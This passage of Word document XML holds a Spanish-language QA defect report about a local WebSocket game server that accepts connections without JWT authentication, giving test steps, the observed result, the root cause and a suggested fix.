              <w:t xml:space="preserve">DEF-SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware y software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PC, 16GB RAM, Intel Core i5 · Node.js 20 · Jest v29 + ws</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sistema operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Navegador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resolución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1920x1080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Comentarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Detectado en TC-SEC-08 — Seguridad OWASP A01 (Control de Acceso)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nombre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Servidor WebSocket acepta conexiones sin autenticación JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">El endpoint ws://localhost:4000/ws acepta el handshake de cualquier cliente sin verificar la presencia ni validez de un JWT. Un usuario anónimo puede conectarse y unirse a la cola de matchmaking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Encargado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Andrés Gustavo Arias Ruiz</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Prioridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Alta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Crítica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Precondiciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Backend corriendo con WebSocket activo en /ws.
2. Cliente ws (npm ws) disponible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Conectar new WebSocket("ws://localhost:{port}/ws") sin token JWT.
2. Escuchar evento "open".
3. Enviar {"type":"join","username":"hacker_sin_auth"}.
4. Verificar si recibe {"type":"waiting"}.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado esperado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ws.on("error") disparado — conexión rechazada por falta de JWT.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado obtenido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ws.on("open") disparado. Servidor responde {"type":"connected","clientId":"xxx"}. Al enviar join, responde {"type":"waiting"}. Cliente anónimo admitido en matchmaking.
Test [DEF-SEC-04] FALLA: done(new Error("DEFECTO: servidor aceptó conexión sin JWT")).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="25%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Notas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="75%"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Causa raíz: backend/realtime/websocket.js:725 no verifica token en el handshake (wss.handleUpgrade).
Correción: Leer query param token=JWT o header Authorization en el evento "upgrade" y rechazar con socket.destroy() si es inválido.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="C55A11" w:sz="6"/>
          <w:left w:val="single" w:color="C55A11" w:sz="6"/>
          <w:bottom w:val="single" w:color="C55A11" w:sz="6"/>
          <w:right w:val="single" w:color="C55A11" w:sz="6"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="100"/>
        <w:gridCol w:w="100"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="C55A11" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reporte de Defecto: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DEF-SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
